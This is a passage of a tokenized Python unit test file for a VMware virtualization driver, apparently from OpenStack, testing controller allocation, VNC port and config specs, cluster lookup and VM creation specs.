number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'0'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1001'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'1'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1002'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'2'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1003'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'_get_bus_number_for_scsi_controller'
op|','
nl|'\n'
name|'devices'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_ide_default
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_ide_default'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that default IDE controllers are used when there is a free slot'
nl|'\n'
comment|'# on them'
nl|'\n'
indent|' '
name|'disk1'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'disk2'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'1'
op|')'
newline|'\n'
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk1'
op|','
name|'disk2'
op|','
name|'ide0'
op|','
name|'ide1'
op|']'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'None'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
string|"'ide'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'201'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_ide
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_ide'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that a new controller is created when there is no free slot on'
nl|'\n'
comment|'# the default IDE controllers'
nl|'\n'
indent|' '
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'ide0'
op|','
name|'ide1'
op|']'
newline|'\n'
name|'for'
name|'controller_key'
name|'in'
op|'['
number|'200'
op|','
number|'201'
op|']'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'unit_number'
name|'in'
op|'['
number|'0'
op|','
number|'1'
op|']'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
string|"'ide'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'-'
number|'101'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNotNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_scsi
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_scsi'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that we allocate on existing SCSI controller if there is a free'
nl|'\n'
comment|'# slot on it'
nl|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|')'
op|']'
newline|'\n'
name|'for'
name|'unit_number'
name|'in'
name|'range'
op|'('
number|'7'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'1000'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1000'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'8'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_scsi_new_controller
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_scsi_new_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that we allocate on existing SCSI controller if there is a free'
nl|'\n'
comment|'# slot on it'
nl|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'15'
op|')'
op|']'
newline|'\n'
name|'for'
name|'unit_number'
name|'in'
name|'range'
op|'('
number|'15'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'1000'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'-'
number|'101'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'controller_spec'
op|'.'
name|'device'
op|'.'
name|'busNumber'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_config_spec
dedent|''
name|'def'
name|'test_get_vnc_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vnc_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
number|'7'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_enabled'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_enabled'
op|'.'
name|'value'
op|'='
string|"'true'"
newline|'\n'
name|'remote_display_vnc_enabled'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.enabled'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_enabled'
op|')'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_port'
op|'.'
name|'value'
op|'='
number|'7'
newline|'\n'
name|'remote_display_vnc_port'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.port'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_port'
op|')'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_keymap'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_keymap'
op|'.'
name|'value'
op|'='
string|"'en-us'"
newline|'\n'
name|'remote_display_vnc_keymap'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.keyMap'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_keymap'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_fake_vms
dedent|''
name|'def'
name|'_create_fake_vms'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'OptionValue'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'OptionValue'"
op|','
op|'['
string|"'key'"
op|','
string|"'value'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'10'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'ManagedObject'
op|'('
op|')'
newline|'\n'
name|'opt_val'
op|'='
name|'OptionValue'
op|'('
name|'key'
op|'='
string|"''"
op|','
name|'value'
op|'='
number|'5900'
op|'+'
name|'i'
op|')'
newline|'\n'
name|'vm'
op|'.'
name|'set'
op|'('
name|'vm_util'
op|'.'
name|'VNC_CONFIG_KEY'
op|','
name|'opt_val'
op|')'
newline|'\n'
name|'fake_vms'
op|'.'
name|'add_object'
op|'('
name|'vm'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'fake_vms'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_port
dedent|''
name|'def'
name|'test_get_vnc_port'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'self'
op|'.'
name|'_create_fake_vms'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port'
op|'='
number|'5900'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port_total'
op|'='
number|'10000'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'actual'
op|'='
name|'vm_util'
op|'.'
name|'get_vnc_port'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_vms'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|','
number|'5910'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_port_exhausted
dedent|''
name|'def'
name|'test_get_vnc_port_exhausted'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'self'
op|'.'
name|'_create_fake_vms'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port'
op|'='
number|'5900'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port_total'
op|'='
number|'10'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'ConsolePortRangeExhausted'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_vnc_port'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_vms'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_none
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'fake_cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_exists
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'cluster'
op|'='
name|'fake'
op|'.'
name|'ClusterComputeResource'
op|'('
name|'name'
op|'='
string|"'cluster'"
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'cluster'
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIs'
op|'('
name|'cluster'
op|'.'
name|'obj'
op|','
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_missing
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_missing'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'partialObject'
op|'('
name|'path'
op|'='
string|"'cluster'"
op|')'
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_propset_dict_simple
dedent|''
name|'def'
name|'test_propset_dict_simple'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ObjectContent'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'ObjectContent'"
op|','
op|'['
string|"'propSet'"
op|']'
op|')'
newline|'\n'
name|'DynamicProperty'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Property'"
op|','
op|'['
string|"'name'"
op|','
string|"'val'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'object'
op|'='
name|'ObjectContent'
op|'('
name|'propSet'
op|'='
op|'['
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'foo'"
op|','
name|'val'
op|'='
string|'"bar"'
op|')'
op|']'
op|')'
newline|'\n'
name|'propdict'
op|'='
name|'vm_util'
op|'.'
name|'propset_dict'
op|'('
name|'object'
op|'.'
name|'propSet'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"bar"'
op|','
name|'propdict'
op|'['
string|"'foo'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_propset_dict_complex
dedent|''
name|'def'
name|'test_propset_dict_complex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ObjectContent'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'ObjectContent'"
op|','
op|'['
string|"'propSet'"
op|']'
op|')'
newline|'\n'
name|'DynamicProperty'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Property'"
op|','
op|'['
string|"'name'"
op|','
string|"'val'"
op|']'
op|')'
newline|'\n'
name|'MoRef'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Val'"
op|','
op|'['
string|"'value'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'object'
op|'='
name|'ObjectContent'
op|'('
name|'propSet'
op|'='
op|'['
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'foo'"
op|','
name|'val'
op|'='
string|'"bar"'
op|')'
op|','
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'some.thing'"
op|','
nl|'\n'
name|'val'
op|'='
name|'MoRef'
op|'('
name|'value'
op|'='
string|"'else'"
op|')'
op|')'
op|','
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'another.thing'"
op|','
name|'val'
op|'='
string|"'value'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'propdict'
op|'='
name|'vm_util'
op|'.'
name|'propset_dict'
op|'('
name|'object'
op|'.'
name|'propSet'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"bar"'
op|','
name|'propdict'
op|'['
string|"'foo'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'hasattr'
op|'('
name|'propdict'
op|'['
string|"'some.thing'"
op|']'
op|','
string|"'value'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"else"'
op|','
name|'propdict'
op|'['
string|"'some.thing'"
op|']'
op|'.'
name|'value'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"value"'
op|','
name|'propdict'
op|'['
string|"'another.thing'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_detach_virtual_disk_spec
dedent|''
name|'def'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'self'
op|','
name|'destroy_disk'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'virtual_device_config'
op|'='
name|'vm_util'
op|'.'
name|'detach_virtual_disk_spec'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_device'"
op|','
nl|'\n'
name|'destroy_disk'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'remove'"
op|','
name|'virtual_device_config'
op|'.'
name|'operation'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake_device'"
op|','
name|'virtual_device_config'
op|'.'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|','
nl|'\n'
name|'virtual_device_config'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
name|'if'
name|'destroy_disk'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'destroy'"
op|','
name|'virtual_device_config'
op|'.'
name|'fileOperation'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'hasattr'
op|'('
name|'virtual_device_config'
op|','
string|"'fileOperation'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_virtual_disk_spec
dedent|''
dedent|''
name|'def'
name|'test_detach_virtual_disk_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'destroy_disk'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_virtual_disk_destroy_spec
dedent|''
name|'def'
name|'test_detach_virtual_disk_destroy_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'destroy_disk'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_vm_config_spec
dedent|''
name|'def'
name|'_create_vm_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'spec'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'spec'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'spec'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'spec'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'spec'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'spec'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'spec'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'spec'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'return'
name|'spec'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_extra_config_spec
dedent|''
name|'def'
name|'test_get_vm_extra_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'extra_opts'
op|'='
op|'{'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'key'
op|':'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'value'
op|'}'
newline|'\n'
name|'res'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_extra_config_spec'
op|'('
name|'fake_factory'
op|','
name|'extra_opts'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'res'
op|'.'
name|'extraConfig'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'key'
op|','
name|'res'
op|'.'
name|'extraConfig'
op|'['
number|'0'
op|']'
op|'.'
name|'key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'value'
op|','
name|'res'
op|'.'
name|'extraConfig'
op|'['
number|'0'
op|']'
op|'.'
name|'value'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec
dedent|''
name|'def'
name|'test_get_vm_create_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'self'
op|'.'
name|'_create_vm_config_spec'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_serial_port
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_serial_port'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'serial_port_service_uri'
op|'='
string|"'foobar'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'serial_port_proxy_uri'
op|'='
string|"'telnet://example.com:31337'"
op|','
nl|'\n'
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'serial_port_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_serial_port_spec'
op|'('
name|'fake_factory'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'self'
op|'.'
name|'_create_vm_config_spec'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
